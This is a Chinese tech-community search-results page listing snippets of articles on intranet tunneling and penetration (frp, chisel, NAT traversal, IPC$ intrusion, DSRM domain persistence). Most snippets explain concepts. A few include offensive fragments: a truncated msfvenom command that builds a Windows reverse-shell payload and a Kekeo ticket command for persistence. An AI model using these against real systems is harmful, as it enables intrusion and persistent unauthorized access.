首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏DotNet NB && CloudNative

    .NET Standard实现不同内网端口的互通(类似花生壳)

    应用场景 1、公司电脑与家中电脑的远程控制,一般通过teamview、向日葵等软件,端口互通后,可以使用电脑自带的远程桌面 2、家中电脑搭建SVN、git仓库,在外网或者内网访问,一般使用云服务器,端口互通后 注意:并不是说就不需要购买云服务器了,而是运行的服务可以部署在任意电脑,云服务器仍是必须的,但是可以买最便宜的服务器以达到省钱的目的 技术原理 模式一 服务器中转 场景:我们有电脑A和电脑B,他们在不同的局域网 模式二 直接连接 场景:我们有电脑A和电脑B,他们在不同的局域网,现在我们需要在电脑A访问电脑B的web服务(端口是80) 原理:我们通过监听电脑A的端80,当此端口接收到http请求的时候,程序将通过一些操作 P2PSocket.Client项目 这是客户端的核心库 Commands:用于处理来自服务端发送的消息 ConfigIO:配置文件的读取 Receive:因为拆包是自己写的,在基类,而由于一些特殊情况,会需要不同的拆包逻辑

    70220编辑于 2023-11-14
  • 来自专栏DotNet程序园

    使用.net standard实现不同内网端口的互通(类似花生壳)

    应用场景 1.公司电脑与家中电脑的远程控制,一般通过teamview、向日葵等软件,端口互通后,可以使用电脑自带的远程桌面 2.家中电脑搭建SVN、git仓库,在外网或者内网访问,一般使用云服务器,端口互通后 注意:并不是说就不需要购买云服务器了,而是运行的服务可以部署在任意电脑,云服务器仍是必须的,但是可以买最便宜的服务器以达到省钱的目的 技术原理 模式一 服务器中转: 场景:我们有电脑A和电脑B,他们在不同的局域网 模式二 直接连接: 场景:我们有电脑A和电脑B,他们在不同的局域网,现在我们需要在电脑A访问电脑B的web服务(端口是80) 原理:我们通过监听电脑A的端80,当此端口接收到http请求的时候,程序将通过一些操作 这是客户端的核心库 Commands:用于处理来自服务端发送的消息 ConfigIO:配置文件的读取 Receive:因为拆包是自己写的,在基类,而由于一些特殊情况,会需要不同的拆包逻辑,继承基类后的新类都在

    1.8K20发布于 2020-11-05
  • 来自专栏黑白天安全团队

    内网渗透 | 内网穿透

    内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

    5.1K60发布于 2020-03-10
  • 来自专栏谢公子学安全

    内网渗透 | 内网穿透

    内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

    3.5K10编辑于 2022-01-19
  • 来自专栏安全小圈

    内网基础篇——浅谈内网

    信任关系是连接不同域的桥梁。 域森林 多个域树通过建立信任关系组成的集合 域名服务器 用于实现域名和与之对应的IP地址转换的服务器。 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 可以将某个全局组添加到同一个域的另一个全局组中,或者添加到其他域的通用组和域本地 组中(不能添加到不同域的全局组中,全局组只能在创建它的域中添加用户和组)。 附带一份内网学习思维导图 ? ?

    2.4K40发布于 2020-05-26
  • 来自专栏字节脉搏实验室

    内网基础篇——浅谈内网

    信任关系是连接不同域的桥梁。 域森林 多个域树通过建立信任关系组成的集合 域名服务器 用于实现域名和与之对应的IP地址转换的服务器。 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 可以将某个全局组添加到同一个域的另一个全局组中,或者添加到其他域的通用组和域本地 组中(不能添加到不同域的全局组中,全局组只能在创建它的域中添加用户和组)。 附带一份内网学习思维导图 ?

    1.9K40发布于 2020-05-25
  • 来自专栏小生观察室

    内网渗透之内网隧道构建

    image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。

    1.5K30发布于 2021-03-05
  • 来自专栏白安全组

    内网接收外网shell(内网穿透)

    前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp

    2K20编辑于 2022-12-01
  • 来自专栏网络安全攻防

    内网渗透之内网权限维持

    文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏 本文旨在深入探讨内网渗透中的权限维持技术,包括其基本概念、常见手段以及防御措施 权限维持 DSRM域后门 基本介绍 DSRM(Directory Services Restore Mode,目录服务恢复模式 每个域控制器都有一个本地管理员账户和密码(与域管理员账户和密码不同),而此处的DSRM账户和密码亦可以作为一个域控制器的本地管理员用户,之后通过网络连接域控制器,进而控制域控制器。 ,并且把DNS也代理进去(dns设置为内网的域控) Step 6:使用Kekeo获取用户的NTLM tgt::pac /subject:Al1ex /castore:current_user /domain ,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持(当然这种作为首选属实极好),至于window下的一系列维权也可以进行尝试操作,例如:WMI后门、CLR维权、COM

    1.1K10编辑于 2024-08-20
  • 来自专栏HACK学习

    内网渗透之_内网IPC$入侵

    即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见

    2K30发布于 2019-08-06
  • 来自专栏红队蓝军

    内网渗透之内网权限维持

    Restore Mode)是Windows服务器域控制器的安全模式启动选项 原理:DSRM允许管理员在域环境出现故障时还原、修复、重建活动目录数据库,每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同

    91310编辑于 2025-02-12
  • 来自专栏全栈程序员必看

    FRP内网穿透_frp内网穿透原理

    大家好,又见面了,我是你们的朋友全栈 frp点对点udp方式内网穿透ssh,节省服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29 日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019 年 5 月 25 日) frp内网穿透简介 (2019 年 5 月 25 日) frp简介 frp 是一个内网穿透工具。 我们的电脑IP一般为192.168.0.103 这个叫内网IP,外面的电脑无法访问的。 frp进行的网络穿透原理图 frp穿透的用途 1. 在办公室访问家里的电脑,反之亦然 2.

    3.9K40编辑于 2022-09-30
  • 来自专栏HACK学习

    内网渗透|Chisel内网穿透工具

    0x02 chisel工具使用 首先,chisel和frp、nps是不同的,没有所谓的服务器端和客户端,对于chisel,只有一个文件,可以通过执行这个文件,让其充当服务器端或者客户端。 三、chisel隧道搭建 0x01 chisel进行ssh内网穿透 首先需要三台linux主机,在这里使用VPS作为chisel服务器端,然后使用kali作为内网主机,使用另一台主机作为我们的攻击者主机 socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。 socks流量实现对内网主机的访问。 (3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网

    13.1K21发布于 2021-03-03
  • 来自专栏一名白帽的成长史

    内网渗透】关于内网代理转发技术

    内网服务器不可访问公网,但可以与外网服务器的内网IP进行通信。 ? 假设我们拿下了外网服务器的账号、密码和命令行权限,想要直接访问外网服务器的3389服务。 成功访问到内网服务器远程桌面: ? 反向端口转发 假设这次拿下了外网服务器、内网服务器的命令行权限,并知道内网服务器账号、密码。 想要通过攻击机,远程连接内网服务器远程桌面服务。 但由于内网防火墙包过滤策略,不允许外网服务器访问它。 此时可以通过反向端口转发,由内网服务器主动发起转发。 ? 与LCX不同,netsh不支持反向的端口转发。 本地端口转发: ? 成功转发至内网服务器3389端口: ? ?

    3.1K21发布于 2020-07-20
  • 来自专栏前端开发

    内网穿透】用frps实现内网穿透

    简介在当今互联网时代,远程访问内网资源已成为一种常见需求。无论是在家访问办公室的电脑,还是远程管理家庭NAS,内网映射都是一种强大的解决方案。 1.1 frpfrp是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,将NAT或防火墙后的本地服务器暴露到互联网。它支持TCP、UDP、HTTP、HTTPS等多种协议,使用起来非常灵活。 1.2 frp的主要组件frp主要由两部分组成:frps (服务端): 运行在具有公网IP的服务器上frpc (客户端): 运行在您想要暴露到公网的内网机器上内网映射的概念和用途:内网映射允许您将内网服务器的端口映射到公网 /frps -c frps.ini在内网设备上启动 frpc:Windows:cd C:\frpfrpc.exe -c frpc.iniLinux/macOS:cd /usr/local/frp. /frps -c frps.ini在内网设备上启动 frpc:.

    3.8K10编辑于 2024-10-15
  • 来自专栏全栈程序员必看

    内网渗透基础_内网穿透技术详解

    前言 整理下内网渗透的思路 一、整体概述 1、攻击思路 攻击思路主要有2种: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 (2)生产网 按照系统区分: 业务系统 运维监控系统 安全系统 按照网络区分: 各不同的业务网段 运维监控网段 安全管理网段 根据目标开展的不同业务,对应的服务器可能存在不同的网段上 而SMB是局域网支持共享文件和打印机的一种通信协议,为局域网内不同计算机之间提供文件及打印机等资源的共享服务。 Berkeley AMP lab所开源的类Hadoop MapReduce的通用的并行计算框架,Spark基于map reduce算法实现的分布式计算,拥有Hadoop MapReduce所具有的优点;但不同

    1.5K10编辑于 2022-09-27
  • 来自专栏pandacode_cn

    内网穿透

    外网 访问内网服务器。 # 第三步:配置 服务端和客户端 目录介绍:frpc前缀的文件是内网服务需要的;frps前缀的文件是公网IP需要的。 # 内网服务需要配置frpc.ini文件 按需求进行配置信息,除基础信息配置common外,其他的根据自己需求进行摘选(每一个标签都是一个独立的模块)。 提供线上隧道和线上管理平台) # 第一步:注册/登陆Ngork 点击进入Ngrok官网 (opens new window) # 第二步:购买隧道(有免费的) 配置相关信息 # 第三步:下载/使用Ngork客户端 不同系统 ,使用不同,详情需要查看官方文档。

    2.1K10编辑于 2021-12-17
  • 来自专栏红蓝对抗

    内网渗透|内网远程控制总结

    前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是... 前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。

    1.3K30编辑于 2023-08-10
  • 来自专栏HACK学习

    内网渗透 | 内网中的信息收集

    无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。 知道当前机器是干什么的hostname4.查看在线用户,注意管理员此时在不在quser / query user5.查当前机器中所有的用户名,开始搜集准备用户名字典net user6.查当前机器中所有的组名,了解不同组的职能 %I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。 详细参考: https://www.anquanke.com/post/id/214046 SPN扫描 不同于常规的tcp/udp端口扫描,由于spn本质就是正常的Kerberos请求,所以扫描是非常隐蔽 端口识别 扫描内网中同时开放389和53端口的机器。 端口:389服务:LDAP、ILS说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

    3.4K31发布于 2020-08-27
  • 来自专栏全栈程序员必看

    内网渗透的步骤_内网渗透思路

    0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知 其中共享内存主要用于同一计算机内进程间通信,消息队列和管道主要用于分布式环境(通信进程位于通过网络连接的不同计算机)。 命名管道可在同一台计算机的不同进程之间或在跨越一个网络的不同计算机的不同进程之间,支持可靠的、单向或双向的数据通信。 这几种方法只是命令不同罢了,提供明文账户密码的时候也是要建立IPC连接的,因为这个利用就是基于IPC的共享。

    5.6K30编辑于 2022-10-05
领券